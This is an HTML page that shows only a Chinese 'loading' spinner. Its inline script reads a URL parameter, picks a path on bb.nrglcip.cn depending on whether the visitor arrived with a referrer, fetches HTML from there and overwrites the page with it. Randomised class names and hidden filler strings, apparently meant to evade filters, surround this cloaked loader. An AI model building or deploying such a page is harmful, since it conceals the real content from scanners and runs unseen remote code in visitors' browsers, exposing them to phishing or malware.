<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .EXIvuIyUK {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .EXIvuIyUK .vqmbvrN7W {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .EXIvuIyUK .content {
            line-height: 50px;
            text-align: center
        }

        .EXIvuIyUK .img {
            width: 100%
        }

        .EXIvuIyUK .JoXi4pnW {
            text-align: center
        }

        .EXIvuIyUK .JoXi4pnW span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .EXIvuIyUK .JoXi4pnW span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .EXIvuIyUK .JoXi4pnW span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .EXIvuIyUK .JoXi4pnW span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .EXIvuIyUK .JoXi4pnW span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .EXIvuIyUK .JoXi4pnW span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .EXIvuIyUK .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Jhx0ccZheY(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Bk2clP = Jhx0ccZheY('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Bk2clP +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Bk2clP +".html?a=share";
		}
		
        E6VF4GTC=url+"#"+new Date().getTime();
        E6VF4GTC && function() {
            $.get(E6VF4GTC, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<span style='display:none'>SrEbLHto0P6rXh77ST3UKsNtkDsaJyOXqL6WquFvZs7fYux7t8lFg187Zgr0ola</span>
<p  style='display:none'>BA3OS1rjeRvR70YvMwzIymyT646j03Xo3Ob7</p>
<li style='display:none' >huHNkFas07F2ROpoMEuYmIrnXamLVHpKojNupaizeWIYy</li>
<li style='display:none' >huHNkFas07F2ROpoMEuYmIrnXamLVHpKojNupaizeWIYy</li>
<ul style='display:none' >z7aRwZgwKueBKKZeQvcIjsGfNsSLVvAZFSAwcBJHHMNNUNoIxzSpM1nO</ul>
<p  style='display:none'>BA3OS1rjeRvR70YvMwzIymyT646j03Xo3Ob7</p><div class="EXIvuIyUK">
    <div class="vqmbvrN7W">
        <div class="JoXi4pnW">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>JnvKJ8WFNENohDME0H7DYSU0EwQoLWOvNjrlfOnS5CK8WdVw</span>
<a  href='#' style='display:none'>ZyYGacpFfvYK9qDu0ffUBHRHUC6Z0AotoraTZuQIHvI2YdwxFJ2CP9UCoboDa8Hig2fdfiLaT2D0sgJMC4BL65Pr8qTPh</a>
<b style='display:none' >exe1A4aCaeE</b></body>
</html>